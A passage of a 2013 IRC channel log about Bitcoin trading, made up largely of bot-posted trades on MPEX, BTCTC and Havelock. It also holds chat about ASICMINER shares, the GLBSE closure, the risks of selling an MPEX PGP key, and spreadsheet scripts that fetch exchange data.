0.0 USD in total. Feb 01 02:17:28 ;;bids 20 Feb 01 02:17:30 There are currently 10170.349 bitcoins demanded at or over 20.0 USD, worth 205310.829868 USD in total. Feb 01 02:24:22 [MPEX] [S.DICE] 674 @ 0.00724211 = 4.8812 BTC [+] Feb 01 02:24:24 [MPEX] [S.DICE] 926 @ 0.00727013 = 6.7321 BTC [+] Feb 01 02:27:13 [MPEX] [S.MPOE] 4100 @ 0.00067678 = 2.7748 BTC [+] Feb 01 02:27:15 [MPEX] [S.MPOE] 7035 @ 0.00067204 = 4.7278 BTC [-] Feb 01 02:30:42 ;;ticker Feb 01 02:30:44 BTCUSD ticker | Best bid: 20.55104, Best ask: 20.69999, Bid-ask spread: 0.14895, Last trade: 20.70000, 24 hour volume: 99996.90950064, 24 hour low: 19.51123, 24 hour high: 21.43000, 24 hour vwap: 20.58455 Feb 01 02:30:47 Bitcoin is to fiat what kryptonite is to superman. Feb 01 02:30:50 [MPEX] [S.MPOE] 205 @ 0.00067204 = 0.1378 BTC [-] Feb 01 02:30:51 [MPEX] [S.MPOE] 3977 @ 0.00066322 = 2.6376 BTC [-] Feb 01 02:31:04 smickles you got a moment? Feb 01 02:31:18 thestringpuller: sure Feb 01 02:31:45 [MPEX] [S.MPOE] 1757 @ 0.00066159 = 1.1624 BTC [-] Feb 01 02:32:30 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Feb 01 02:35:15 [MPEX] [S.MPOE] 23382 @ 0.00067686 = 15.8263 BTC [+] Feb 01 02:35:17 [MPEX] [S.MPOE] 13556 @ 0.00067706 = 9.1782 BTC [+] Feb 01 02:35:18 [MPEX] [S.MPOE] 6258 @ 0.00067745 = 4.2395 BTC [+] Feb 01 02:35:20 [MPEX] [S.MPOE] 10000 @ 0.000678 = 6.78 BTC [+] Feb 01 02:35:21 [MPEX] [S.MPOE] 7504 @ 0.00067812 = 5.0886 BTC [+] Feb 01 02:40:18 [BTCTC] [SYNERGY] 2 @ 0.13 = 0.26 BTC [-] Feb 01 02:41:20 [BTCTC] [SYNERGY] 1 @ 0.1102 BTC [-] Feb 01 02:41:22 [BTCTC] [SYNERGY] 1 @ 0.1101 BTC [-] Feb 01 02:41:24 [BTCTC] [SYNERGY] 10 @ 0.11 = 1.1 BTC [-] Feb 01 02:43:59 [MPEX] [S.MPOE] 7723 @ 0.00067604 = 5.2211 BTC [-] Feb 01 02:44:49 /q thestringpuller Feb 01 02:44:51 lol Feb 01 02:45:47 Buy more BTC-BOND Feb 01 02:45:56 [MPEX] [S.MPOE] 6818 @ 0.00067604 = 4.6092 BTC [-] Feb 01 02:45:58 [MPEX] [S.MPOE] 11632 @ 0.00066147 = 7.6942 BTC [-] Feb 01 02:52:33 [MPEX] [S.MPOE] 8450 @ 0.00066438 = 5.614 BTC [+] Feb 01 02:53:37 [BTCTC] [COGNITIVE] 1 @ 0.29 BTC [-] Feb 01 02:53:39 [BTCTC] [COGNITIVE] 4 @ 0.2802 = 1.1208 BTC [-] Feb 01 02:53:40 [BTCTC] [COGNITIVE] 8 @ 0.28 = 2.24 BTC [-] Feb 01 02:53:41 [BTCTC] [COGNITIVE] 1 @ 0.2639 BTC [-] Feb 01 02:53:43 [BTCTC] [COGNITIVE] 1 @ 0.25 BTC [-] Feb 01 02:53:44 [BTCTC] [COGNITIVE] 12 @ 0.2402 = 2.8824 BTC [-] Feb 01 02:53:46 [BTCTC] [COGNITIVE] 25 @ 0.2401 = 6.0025 BTC [-] Feb 01 02:55:41 How many shares did ASICMINER sell? 20k of 40k total issued Feb 01 02:56:09 They only issued 40k? Feb 01 02:56:14 is what they said. Feb 01 02:56:19 o no my bad, 400k Feb 01 02:56:21 40k btc worth Feb 01 02:56:28 200k / 400k shares at .1 each Feb 01 02:56:29 ah, 200k Feb 01 02:56:35 shares Feb 01 02:56:38 yes. Feb 01 02:59:07 Namworld: hey Feb 01 02:59:15 i need your email Feb 01 02:59:54 [MPEX] [S.MPOE] 13250 @ 0.00066438 = 8.803 BTC [+] Feb 01 02:59:56 [MPEX] [S.MPOE] 2650 @ 0.00066228 = 1.755 BTC [-] Feb 01 03:01:11 Bye bye cognitive Feb 01 03:02:03 If only GLBSE hadn't been closed Feb 01 03:02:14 I'd have like ~1200 ASICMINER Feb 01 03:02:41 net lost ? Feb 01 03:03:27 I lended them for shorting, and the shorting contract specified if shares weren't trading at the time of expiry, I'd be paid a 1 BTC compensation instead of getting shares. Feb 01 03:03:33 [MPEX] [S.MPOE] 13050 @ 0.00066228 = 8.6428 BTC [-] Feb 01 03:03:35 [MPEX] [S.MPOE] 2768 @ 0.00066147 = 1.8309 BTC [-] Feb 01 03:03:36 [MPEX] [S.MPOE] 5982 @ 0.00066127 = 3.9557 BTC [-] Feb 01 03:04:39 and yeah, so ASICMINER never started being traded again after GLBSE closed, they were not reissued Feb 01 03:05:02 Network total 28.727 Thash/s. Feb 01 03:05:03 So shares could not be bought back for me Feb 01 03:05:05 no asics yet Feb 01 03:05:47 not even one? ;P Feb 01 03:05:55 ;;bc,nethash Feb 01 03:06:07 hmm Feb 01 03:06:10 ;;nethash Feb 01 03:06:11 25728.937914035028 Feb 01 03:06:11 25728.937914 Feb 01 03:06:21 oh, both Feb 01 03:06:41 ;;bc,price Feb 01 03:06:43 Next Price Estimate: 22.823889 | Next Price In About 3 days, 1 hour, 40 minutes, and 4 seconds Feb 01 03:08:02 smickles maybe one Feb 01 03:08:07 certainly not 20 Feb 01 03:08:32 you nethash is bigger than mine :o Feb 01 03:08:58 [HAVELOCK] [SDICE] 3 @ 0.705 = 2.115 BTC [+] Feb 01 03:09:04 well Feb 01 03:09:10 no one wants to sell their asicmining shares Feb 01 03:09:17 I have asked around Feb 01 03:09:17 !ticker m s.dice Feb 01 03:09:18 [MPEX:S.DICE] 1D: 0.00534524 / 0.00698261 / 0.00739499 (87093 shares, 608.14 BTC), 7D: 0.00534524 / 0.0071615 / 0.0075 (625259 shares, 4,477.80 BTC), 30D: 0.00085848 / 0.00476452 / 0.0075 (6549766 shares, 31,206.53 BTC) Feb 01 03:09:19 garzik has an asic Feb 01 03:09:30 i dont think he was lyig Feb 01 03:09:37 liying Feb 01 03:09:40 no, bitcoind foundation has one too Feb 01 03:09:55 charles / yankee of bitinstnat was there and saw/played with it in person Feb 01 03:09:57 wth does the bf have one? Feb 01 03:10:02 Ukto pity they STILL haven't gotten with the program and listed Feb 01 03:10:13 i think i'd short them all over again Feb 01 03:10:14 https://bitcoinfoundation.org/blog/?p=112 Feb 01 03:10:29 why? Feb 01 03:10:36 bf? Feb 01 03:10:37 wha? Feb 01 03:10:39 oh Feb 01 03:10:42 foundation Feb 01 03:10:43 mircea_popescu: who listed? Feb 01 03:10:49 but yeah there it is :) Feb 01 03:11:01 they have a special one with an xtra asic module Feb 01 03:11:22 Anyone wanna sell ASICMINING shares? pm me :) Feb 01 03:11:28 as doubtful as it is Feb 01 03:11:44 I think owning one of those is outside of their misson statement Feb 01 03:12:42 or, at least, their 3 primary objectives Feb 01 03:12:51 owning what ?! Feb 01 03:14:11 I technically should have 827 shares left of ASICMINER Feb 01 03:14:16 So I have a little Feb 01 03:14:20 I took: < Ukto> no, bitcoind foundation has one too " to mean that they owned one Feb 01 03:15:01 have one in their posestion, not sure if they paid for it Feb 01 03:15:38 all i see is a long list with polimeda at the top, and no understanding to be had Feb 01 03:16:13 long list of what? Feb 01 03:16:15 0,o Feb 01 03:16:25 heh, on mircea_popescu's blog Feb 01 03:16:48 it looks like he's bragging about something Feb 01 03:16:55 what... i dunno Feb 01 03:17:40 [MPEX] [S.MPOE] 5400 @ 0.00066488 = 3.5904 BTC [+] Feb 01 03:17:41 [MPEX] [S.MPOE] 4800 @ 0.00066979 = 3.215 BTC [+] Feb 01 03:18:26 smickles link ? Feb 01 03:19:03 lol Feb 01 03:21:44 or wtf are we talking about Feb 01 03:27:37 mircea_popescu: it was at http://trilema.com/ , but no more Feb 01 03:28:09 lol ok. Feb 01 03:28:16 the root picks a random article Feb 01 03:28:21 you need it's url by clicking on the title Feb 01 03:32:11 0,o Feb 01 03:37:42 ok that picostocks idiot is taking the cake already. Feb 01 03:37:50 [MPEX] [S.MPOE] 4321 @ 0.00066276 = 2.8638 BTC [-] Feb 01 03:37:52 [MPEX] [S.MPOE] 9650 @ 0.00066268 = 6.3949 BTC [-] Feb 01 03:37:53 [MPEX] [S.MPOE] 979 @ 0.00066127 = 0.6474 BTC [-] Feb 01 03:40:18 [MPEX] [S.MPOE] 4239 @ 0.00066127 = 2.8031 BTC [-] Feb 01 03:40:19 [MPEX] [S.MPOE] 661 @ 0.00066115 = 0.437 BTC [-] Feb 01 03:41:01 [BTCTC] [BTC-TRADING-PT] 1 @ 0.1175 BTC [-] Feb 01 03:41:03 [BTCTC] [BTC-TRADING-PT] 1 @ 0.1174 BTC [-] Feb 01 03:41:34 [BTCTC] [GOLD] 1 @ 0.8304 BTC [+] Feb 01 03:41:58 [HAVELOCK] [SDICE] 3 @ 0.705 = 2.115 BTC [+] Feb 01 03:43:36 [BTCTC] [BTC-TRADING-PT] 85 @ 0.1172 = 9.962 BTC [-] Feb 01 03:43:38 [BTCTC] [BTC-TRADING-PT] 3 @ 0.1171 = 0.3513 BTC [-] Feb 01 03:44:40 [BTCTC] [MININGCO.ETF] 1 @ 0.5198 BTC [-] Feb 01 03:45:08 [MPEX] [S.MPOE] 4321 @ 0.00066133 = 2.8576 BTC [+] Feb 01 03:45:10 [MPEX] [S.MPOE] 19100 @ 0.00066131 = 12.631 BTC [-] Feb 01 03:45:11 [MPEX] [S.MPOE] 2343 @ 0.00066114 = 1.5491 BTC [-] Feb 01 03:47:47 [BTCTC] [LTC-MINING] 1 @ 0.4 BTC [-] Feb 01 03:49:03 [MPEX] [S.MPOE] 4321 @ 0.00066961 = 2.8934 BTC [+] Feb 01 03:49:05 [MPEX] [S.MPOE] 14088 @ 0.00066979 = 9.436 BTC [+] Feb 01 03:49:41 [BTCTC] [BTC-MINING] 1 @ 0.4999 BTC [+] Feb 01 03:50:06 [MPEX] [S.MPOE] 3660 @ 0.00066132 = 2.4204 BTC [-] Feb 01 03:50:08 [MPEX] [S.MPOE] 12390 @ 0.00066114 = 8.1915 BTC [-] Feb 01 03:50:08 [MPEX] [S.MPOE] 5550 @ 0.00066024 = 3.6643 BTC [-] Feb 01 03:52:15 [BTCTC] [BASIC-MINING] 1 @ 0.3399 BTC [-] Feb 01 03:54:40 [BTCTC] [SYNERGY] 1 @ 0.12 BTC [+] Feb 01 03:55:57 [HAVELOCK] [SDICE] 4 @ 0.707 = 2.828 BTC [+] Feb 01 03:57:45 [MPEX] [S.MPOE] 1763 @ 0.00066979 = 1.1808 BTC [+] Feb 01 03:57:47 [MPEX] [S.MPOE] 4321 @ 0.00067811 = 2.9301 BTC [+] Feb 01 03:57:48 [MPEX] [S.MPOE] 2116 @ 0.00067812 = 1.4349 BTC [+] Feb 01 03:58:15 [BTCTC] [BTC-GOLD] 1 @ 0.0321 BTC [-] Feb 01 03:59:03 [MPEX] [S.MPOE] 2180 @ 0.00067812 = 1.4783 BTC [+] Feb 01 03:59:04 [MPEX] [S.MPOE] 4321 @ 0.00067821 = 2.9305 BTC [+] Feb 01 03:59:06 [MPEX] [S.MPOE] 11832 @ 0.00067822 = 8.0247 BTC [+] Feb 01 03:59:07 [MPEX] [S.MPOE] 2367 @ 0.00067863 = 1.6063 BTC [+] Feb 01 04:00:07 [BTCTC] [B.YABMC] 1 @ 0.0239 BTC [+] Feb 01 04:02:26 [MPEX] [S.DICE] 124 @ 0.00727013 = 0.9015 BTC [+] Feb 01 04:05:07 [MPEX] [S.MPOE] 700 @ 0.00066033 = 0.4622 BTC [-] Feb 01 04:06:53 hey erik :) Feb 01 04:07:31 [MPEX] [S.MPOE] 8490 @ 0.00067863 = 5.7616 BTC [+] Feb 01 04:17:30 hi ukto Feb 01 04:17:40 how are things? Feb 01 04:17:58 doing good Feb 01 04:18:07 working on one of the various evil schemes. ;) Feb 01 04:18:58 [HAVELOCK] [SDICE] 2 @ 0.707 = 1.414 BTC [+] Feb 01 04:19:36 If its not evil, it just cant be good. ;) Feb 01 04:19:58 [HAVELOCK] [SDICE] 3 @ 0.708 = 2.124 BTC [+] Feb 01 04:21:57 [HAVELOCK] [SDICE] 10 @ 0.71 = 7.1 BTC [+] Feb 01 04:22:39 evil scheme huh? Feb 01 04:22:57 [HAVELOCK] [SDICE] 27 @ 0.725 = 19.575 BTC [+] Feb 01 04:24:06 [MPEX] [S.MPOE] 13543 @ 0.00067863 = 9.1907 BTC [+] Feb 01 04:24:08 [MPEX] [S.MPOE] 9957 @ 0.00067913 = 6.7621 BTC [+] Feb 01 04:25:03 everything is evil Feb 01 04:25:06 to some extent. ;) Feb 01 04:25:31 I prefer playing sith when playing star wars. ;) Feb 01 04:25:35 its just more.. fun Feb 01 04:26:32 lol Feb 01 04:26:48 I could never play evil in the video games, I always felt guilty Feb 01 04:29:34 btctalk seems down Feb 01 04:30:46 I'm having fun with google spreadsheets and JSON Feb 01 04:30:48 [MPEX] [S.MPOE] 4321 @ 0.000669 = 2.8907 BTC [-] Feb 01 04:30:50 [MPEX] [S.MPOE] 19429 @ 0.00066879 = 12.9939 BTC [-] Feb 01 04:30:57 fetching all sorts of data automatically Feb 01 04:31:19 BTCT.co, MtGox, Blockchain Feb 01 04:31:38 I'll have an auto-updating summary of my holdings and their value Feb 01 04:31:49 Sadly, MPEx has no JSON api I think Feb 01 04:32:57 http://polimedia.us/bitcoin/mpex-vwap.php Feb 01 04:33:49 I could never play evil in the video games, I always felt guilty << whoa! Feb 01 04:33:55 i almost always play the necromancer. Feb 01 04:34:11 AWESOME! Feb 01 04:34:16 MPEx DATA! Feb 01 04:34:21 lol hi Namworld. enjoying interwebs ? Feb 01 04:34:27 Very much Feb 01 04:34:30 Namworld: did you ever talk to amazingrando? Feb 01 04:34:37 [MPEX] [S.MPOE] 1071 @ 0.00066879 = 0.7163 BTC [-] Feb 01 04:34:38 [MPEX] [S.MPOE] 2416 @ 0.00066025 = 1.5952 BTC [-] Feb 01 04:35:01 I added him 2 days ago on skype, no news yet Feb 01 04:35:04 the girl has meanwhile managed to open a rift with hearn too. Feb 01 04:35:22 i wonder how long before the bitcoin coder & geek community gets together a possee and comes to hang me. Feb 01 04:36:13 till april or so. Feb 01 04:37:13 well... at least i get to see the cherries bloom Feb 01 04:39:58 https://www.youtube.com/watch?v=zz_yw0kq3MM Feb 01 04:39:59 Anyone interested in a release of javascript functions for Google Spreadsheets? Feb 01 04:40:00 for the lulz. Feb 01 04:40:07 "monetary policy is spectacular" etc. Feb 01 04:40:10 To fetch all sorts of data? Feb 01 04:40:45 can't hurt anything Feb 01 04:42:40 [MPEX] [S.MPOE] 1176 @ 0.00067913 = 0.7987 BTC [+] Feb 01 04:42:42 [MPEX] [S.MPOE] 4321 @ 0.00067916 = 2.9347 BTC [+] Feb 01 04:42:42 [MPEX] [S.MPOE] 8000 @ 0.00067917 = 5.4334 BTC [+] Feb 01 04:42:43 [MPEX] [S.MPOE] 1903 @ 0.00067981 = 1.2937 BTC [+] Feb 01 04:45:14 [MPEX] [S.MPOE] 4321 @ 0.00067562 = 2.9194 BTC [-] Feb 01 04:45:17 [MPEX] [S.MPOE] 4217 @ 0.00067538 = 2.8481 BTC [-] Feb 01 04:47:40 [MPEX] [S.MPOE] 4321 @ 0.00067549 = 2.9188 BTC [+] Feb 01 04:47:42 [MPEX] [S.MPOE] 14583 @ 0.00067538 = 9.8491 BTC [-] Feb 01 04:48:08 :Namworld : Yes yes **** BEGIN LOGGING AT Fri Feb 1 10:21:14 2013 Feb 01 10:21:48 [BTCTC] [GSDPT] 150 @ 0.0069 = 1.035 BTC [-] Feb 01 10:21:58 ;; ticker Feb 01 10:21:58 BTCUSD ticker | Best bid: 20.71011, Best ask: 20.79000, Bid-ask spread: 0.07989, Last trade: 20.71011, 24 hour volume: 100263.40325466, 24 hour low: 19.86000, 24 hour high: 21.43000, 24 hour vwap: 20.72437 Feb 01 10:24:14 I'm considering getting an MPEX account. Anyone up for helping me get it a little bit cheaper and reap 5 BTC himself as per http://mpex.co/faq.html#13 ? Feb 01 10:26:33 o wow, a whole minute. people will be pissed :D Feb 01 10:26:44 molecular - sure Feb 01 10:27:21 I PMed him alread Feb 01 10:27:24 already* Feb 01 10:27:32 a question: is it allowed to sell MPEX "accounts" (the pgp key)? Feb 01 10:27:58 it's not allowed or disallowed, seeing how i have no control over it Feb 01 10:28:01 so who's going lower than 5 BTC (give me part of that 5 after receiving)? Feb 01 10:28:08 it is however a little silly, as you are opening a security hole. Feb 01 10:29:06 [BTCTC] [GSDPT] 100 @ 0.0069 = 0.69 BTC [-] Feb 01 10:29:06 what happens when a pgp key expires? Feb 01 10:29:20 I agree it's silly, though Feb 01 10:29:27 you'd better have moved all your stuff to a new account or withdrawn Feb 01 10:29:37 whats the security hole? Feb 01 10:29:49 the keyring is on a cold machine and it doesn't keep track of key updates. Feb 01 10:30:00 fancypants you never know whether the person selling a pgp key doesn't keep a copy. Feb 01 10:30:03 it's also a issue for the buyer of the key, because I still have it, right? Feb 01 10:30:09 that's the issue. Feb 01 10:30:29 mircea_popescu, you can be pretty sure he keeps a copy Feb 01 10:30:35 I hadn't considered that Feb 01 10:30:40 right. Feb 01 10:31:07 so now you're exposed to the cp risk of the exchange and of the key seller. Feb 01 10:31:51 [MPEX] [S.DICE] 344 @ 0.00719622 = 2.4755 BTC [-] Feb 01 10:31:53 [MPEX] [S.DICE] 956 @ 0.00717339 = 6.8578 BTC [-] Feb 01 10:32:37 so, no security hole to game the affiliate program then? Feb 01 10:32:56 how can you game it at all? Feb 01 10:33:04 ya srsly. w hat's to game ? Feb 01 10:34:17 i don't know namworld but if I tell her me keyed i get 5 Feb 01 10:34:24 keyid Feb 01 10:34:28 molecular is a girl ?! Feb 01 10:35:17 ask her i don't know Feb 01 10:35:41 fancypants: yeah, and molecular gets 5 too. But there's the 30 BTC fee Feb 01 10:35:47 to open an account Feb 01 10:36:02 [BTCTC] [BASIC-MINING] 2 @ 0.33 = 0.66 BTC [-] Feb 01 10:36:09 So it's not like you can game it opening multiple accounts Feb 01 10:37:43 ;;ticker Feb 01 10:37:59 BTCUSD ticker | Best bid: 20.71011, Best ask: 20.79000, Bid-ask spread: 0.07989, Last trade: 20.71011, 24 hour volume: 99063.11903182, 24 hour low: 19.86000, 24 hour high: 21.43000, 24 hour vwap: 20.73462 Feb 01 10:38:07 [HAVELOCK] [SDICE] 6 @ 0.775 = 4.65 BTC [+] Feb 01 10:38:08 [HAVELOCK] [SDICE] 20 @ 0.779 = 15.58 BTC [+] Feb 01 10:39:29 soo what's new this fine morning ? Feb 01 10:39:46 Network total 23.555 Thash/s, this is sad. where did all the asics go Feb 01 10:40:06 Nothing much. After the GLBSE fiasco, my BTC finances are slowly recovering Feb 01 10:40:26 bit by bit, one day after the other Feb 01 10:42:17 http://www.youtube.com/watch?v=aLAxbQxyJSQ Feb 01 10:50:06 [HAVELOCK] [SDICE] 1 @ 0.779 BTC [+] Feb 01 10:55:15 [BTCTC] [BASIC-MINING] 8 @ 0.33 = 2.64 BTC [-] Feb 01 10:56:26 [MPEX] [S.DICE] 1700 @ 0.00735013 = 12.4952 BTC [+] Feb 01 10:59:40 [MPEX] [S.MPOE] 25059 @ 0.00066598 = 16.6888 BTC [-] Feb 01 11:10:47 [MPEX] [S.MPOE] 4452 @ 0.00066598 = 2.9649 BTC [-] Feb 01 11:14:56 [MPEX] [S.DICE] 450 @ 0.00733648 = 3.3014 BTC [-] Feb 01 11:16:51 [MPEX] [S.MPOE] 16207 @ 0.00066553 = 10.7862 BTC [-] Feb 01 11:20:04 [MPEX] [S.MPOE] 11000 @ 0.00066553 = 7.3208 BTC [-] Feb 01 11:34:22 [MPEX] [S.MPOE] 8950 @ 0.00066553 = 5.9565 BTC [-] Feb 01 11:38:07 [BTCTC] [B.YABMC] 2 @ 0.0235 = 0.047 BTC [-] Feb 01 11:38:09 [BTCTC] [B.YABMC] 100 @ 0.0235 = 2.35 BTC [-] Feb 01 11:41:23 [MPEX] [S.MPOE] 22438 @ 0.00066553 = 14.9332 BTC [-] Feb 01 11:42:14 ;;bc,stats Feb 01 11:42:42 Error: invalid syntax (, line 1) Feb 01 11:45:27 [MPEX] [S.MPOE] 4321 @ 0.00065708 = 2.8392 BTC [-] Feb 01 11:45:29 [MPEX] [S.MPOE] 34236 @ 0.00065707 = 22.4954 BTC [-] Feb 01 11:45:30 [MPEX] [S.MPOE] 37241 @ 0.00065331 = 24.3299 BTC [-] Feb 01 11:47:51 !ticker m s.bbet Feb 01 11:47:52 [MPEX:S.BBET] 1D: 0.001599 / 0.001599 / 0.001599 (157 shares, 0.25 BTC), 7D: 0.0010499 / 0.00128259 / 0.00159999 (70348 shares, 90.23 BTC), 30D: 0.000337 / 0.00079936 / 0.0035 (2339720 shares, 1,870.29 BTC) Feb 01 11:51:35 [BTCTC] [B.YABMC] 88 @ 0.0235 = 2.068 BTC [-] Feb 01 11:53:28 [MPEX] [S.MPOE] 53 @ 0.00066553 = 0.0353 BTC [+] Feb 01 11:53:30 [MPEX] [S.MPOE] 4321 @ 0.00066662 = 2.8805 BTC [+] Feb 01 11:53:31 [MPEX] [S.MPOE] 15500 @ 0.00066663 = 10.3328 BTC [+] Feb 01 11:53:33 [MPEX] [S.MPOE] 226 @ 0.00066945 = 0.1513 BTC [+] Feb 01 11:56:03 [MPEX] [S.DICE] 930 @ 0.00718594 = 6.6829 BTC [-] Feb 01 11:59:54 [MPEX] [S.MPOE] 15600 @ 0.00066945 = 10.4434 BTC [+] Feb 01 12:02:07 [HAVELOCK] [SDICE] 79 @ 0.779 = 61.541 BTC [+] Feb 01 12:04:07 [HAVELOCK] [SDICE] 64 @ 0.78 = 49.92 BTC [+] Feb 01 12:05:07 [HAVELOCK] [SDICE] 4 @ 0.78 = 3.12 BTC [+] Feb 01 12:10:37 ;; ticker Feb 01 12:13:46 ;; ticker Feb 01 12:15:26 [MPEX] [S.MPOE] 4321 @ 0.00065353 = 2.8239 BTC [-] Feb 01 12:15:28 [MPEX] [S.MPOE] 8871 @ 0.00065331 = 5.7955 BTC [-] Feb 01 12:17:30 [MPEX] [S.DICE] 406 @ 0.00734501 = 2.9821 BTC [+] Feb 01 12:18:41 [MPEX] [S.MPOE] 10350 @ 0.00065331 = 6.7618 BTC [-] Feb 01 12:25:22 BingoBongo: no space after the ; Feb 01 12:26:07 ;; ticker Feb 01 12:26:08 BTCUSD ticker | Best bid: 20.84999, Best ask: 20.85000, Bid-ask spread: 0.00001, Last trade: 20.85000, 24 hour volume: 87857.41531625, 24 hour low: 20.30000, 24 hour high: 21.43000, 24 hour vwap: 20.81479 Feb 01 12:26:57 [MPEX] [S.MPOE] 4321 @ 0.00066928 = 2.892 BTC [+] Feb 01 12:26:59 [MPEX] [S.MPOE] 929 @ 0.00066945 = 0.6219 BTC [+] Feb 01 12:27:10 markedathome: you were saying? Feb 01 12:28:37 ;; bc , stats Feb 01 12:28:38 Error: "bc" is not a valid command. Feb 01 12:29:59 See, the space is problematic there, but not where I initially used it Feb 01 12:30:31 !ticker m s.bbet Feb 01 12:30:32 [MPEX:S.BBET] 1D: 0.001599 / 0.001599 / 0.001599 (157 shares, 0.25 BTC), 7D: 0.0010499 / 0.00128259 / 0.00159999 (70348 shares, 90.23 BTC), 30D: 0.000337 / 0.00079936 / 0.0035 (2339720 shares, 1,870.29 BTC) Feb 01 12:37:22 dude that's subtle. Feb 01 12:37:25 who are you BingoBongo ? Feb 01 12:38:40 I'm on the vodka right now so I'm on this sweet burner username Feb 01 12:38:59 It's like my cellphone Feb 01 12:40:01 mircea_popescu: was I really subtle, I thought that was some serious shade Feb 01 12:40:27 or vodka is telling me that Feb 01 12:45:52 Roughly 22 hrs ago is the first time I've been on IRC in almost decade, so I'm mostly just watching MP Feb 01 12:46:25 ;; ticker Feb 01 12:46:26 BTCUSD ticker | Best bid: 20.78302, Best ask: 20.79500, Bid-ask spread: 0.01198, Last trade: 20.79000, 24 hour volume: 87271.33217445, 24 hour low: 20.30000, 24 hour high: 21.43000, 24 hour vwap: 20.81702 Feb 01 12:53:44 [MPEX] [S.MPOE] 4400 @ 0.00066059 = 2.9066 BTC [-] Feb 01 12:57:13 mircea_popescu: Is the girl going to ever make peace with Mike Hearn? Feb 01 13:15:10 ;; ticker Feb 01 13:15:11 BTCUSD ticker | Best bid: 20.74712, Best ask: 20.79500, Bid-ask spread: 0.04788, Last trade: 20.74712, 24 hour volume: 86489.92273006, 24 hour low: 20.30000, 24 hour high: 21.43000, 24 hour vwap: 20.81965 Feb 01 13:16:46 BingoBongo if he comes to sense im sure she will. Feb 01 13:17:43 I hope so, becaue I really like the bitcoinj clients Feb 01 13:18:03 what;'s one to do with the other tho ? not like she'll kill him or anything Feb 01 13:18:26 (and i happen to think anyone ever involved with java should just be hauled off to jail) Feb 01 13:20:37 https://bitcointalk.org/index.php?topic=140472.msg1495180#msg1495180 and so it begins. missing basic refunds. Feb 01 13:21:19 Maybe scare him off. I'm no big fan of Java. I just like how it is the only way I can run an SPV client that at least need to trust four times more voices than electrum Feb 01 13:21:48 And that Cablepair shit is so three hours ago Feb 01 13:22:11 well i took a shower with the girls gimme a break. Feb 01 13:22:58 anyway, if it scares him off from propping up interscamgro 5 days before it blows up it'll be a net gain for everyone, including himself. Feb 01 13:23:38 Didn't intersango die a month before GLBSE Feb 01 13:24:34 Or am I underestimating the lead in everybody's paint Feb 01 13:24:49 i think both are true, this is quantum finance we're dealing with here. Feb 01 13:25:07 at any rate phantomcircuit was still making announcements re withdrawals etc on haloween Feb 01 13:26:08 Intersango was done before the london meetup though and anyone who knew could smell it Feb 01 13:26:35 ;; ticker Feb 01 13:26:36 BTCUSD ticker | Best bid: 20.71101, Best ask: 20.77999, Bid-ask spread: 0.06898, Last trade: 20.70251, 24 hour volume: 86070.35415238, 24 hour low: 20.30000, 24 hour high: 21.43000, 24 hour vwap: 20.82036 Feb 01 13:29:59 well yes in that sense. Feb 01 13:32:42 it IS kinda getting stale that she has to individually bludgeon everyone into a pulp first. Feb 01 13:32:55 you'd think people'd have enough sense to realise the relative positions and take it from there. Feb 01 13:34:04 A person would think, but sometimes it is necessary to get pick about what person should mean. Feb 01 13:34:32 It would be reasonable that the pirate fellow wiped out all of the people beneath that title Feb 01 13:34:43 Person being the title Feb 01 13:35:05 yeah, i guess. Feb 01 13:35:42 a well, she's young, well hydrated, i guess we find out who's left standing. Feb 01 13:36:40 Given the subjet they collided on hopefully both Feb 01 13:36:50 i should expect so. Feb 01 13:38:00 Of all the subjects they could have collided on, it was maximum block size Feb 01 13:38:22 nah, they met before on something equally marginal Feb 01 13:38:32 i'll have her fish it out. Feb 01 13:39:13 What could be more marginal? The only people who ought to care about maximum block size are dice games and people who bot them. Feb 01 13:39:26 there's a problem with hard forks. Feb 01 13:39:34 Many problems Feb 01 13:39:42 next year the us govt will ask for a hard fork to allow them to disallow selected transactions Feb 01 13:40:15 WHen you hard fork over one issue the temptation arises to just incorporate your Mary Poppins nanny wishlist Feb 01 13:40:31 USG may request, at least in parts Feb 01 13:40:34 moreover, this "only evil people would care" argument is poisonous. Feb 01 13:40:46 I doubt the whole USG would though Feb 01 13:41:03 obviously. that's the advantage of being a government : you ask in parts and benefit in whole. Feb 01 13:41:57 Three letter agencys from my understanding love the Armory client and its forcing new addresses for every transaction Feb 01 13:42:05 d'oh. Feb 01 13:43:18 What transactions could they really disallow and still fund their favored people who can hold a tn Feb 01 13:43:45 they wouldn't even use it. it's not a practical request. Feb 01 13:45:44 The most surprising thing about bitcoin would be if the USG doesn't ignore all of the things it says it opposes so it can leverage the BTC network to transfer value to its more expendable allies Feb 01 13:46:13 there's no reason it wouldn't go both ways simultaneously. Feb 01 13:47:08 True Feb 01 13:47:31 I still imagine such an agency buying NVIDIA Teslas to mine with Feb 01 13:47:47 that's more like 2015 on my calendar. Feb 01 13:47:57 and it'll prolly just be homebrew. Feb 01 13:49:53 aite, i got a meeting, bbl. Feb 01 13:50:03 Cool Feb 01 13:50:30 a! just got this Feb 01 13:50:31 https://bitcointalk.org/index.php?topic=119073.msg1400494#msg1400494 Feb 01 13:50:39 was his take on capital markets lolz. anyway. later. Feb 01 13:51:43 ;; ticker Feb 01 13:51:44 BTCUSD ticker | Best bid: 20.73101, Best ask: 20.79999, Bid-ask spread: 0.06898, Last trade: 20.79999, 24 hour volume: 84432.45122330, 24 hour low: 20.30000, 24 hour high: 21.43000, 24 hour vwap: 20.82546 Feb 01 13:52:04 Holy fuck this shit turned stable Feb 01 14:07:08 [HAVELOCK] [SDICE] 1 @ 0.78 BTC [+] Feb 01 14:10:02 [BTCTC] [COGNITIVE] 1 @ 0.2401 BTC [-] Feb 01 14:18:02 ;; ticker Feb 01 14:18:03 BTCUSD ticker | Best bid: 20.67111, Best ask: 20.70000, Bid-ask spread: 0.02889, Last trade: 20.67110, 24 hour volume: 83562.51579923, 24 hour low: 20.30000, 24 hour high: 21.43000, 24 hour vwap: 20.83008 Feb 01 14:18:24 made a google web app script module whatever the hell they try to categorize it... that you can use in spreadsheets or other apps... that provides bitcoincharts (exchange data and weighted prices) and direct order book highs and lows from exchanges Feb 01 14:18:25 I have long blond hair and a beard. I'm not telling you guys my gender, though. Feb 01 14:18:26 https://script.google.com/macros/s/AKfycbxBLJGpX9Is2ZF5YfjR4XjqjEClHz_rogK-8wEup5N5LuuIGtMb/exec Feb 01 14:18:40 waiting for it to get published to the apps gallery, then you can just install it into your spreadsheet and use the functions Feb 01 14:19:20 if you want more markets let me know. i didnt put a donate link anywhere so, im not trying to mootch if someone has code they'd like to share Feb 01 14:19:44 currently supports 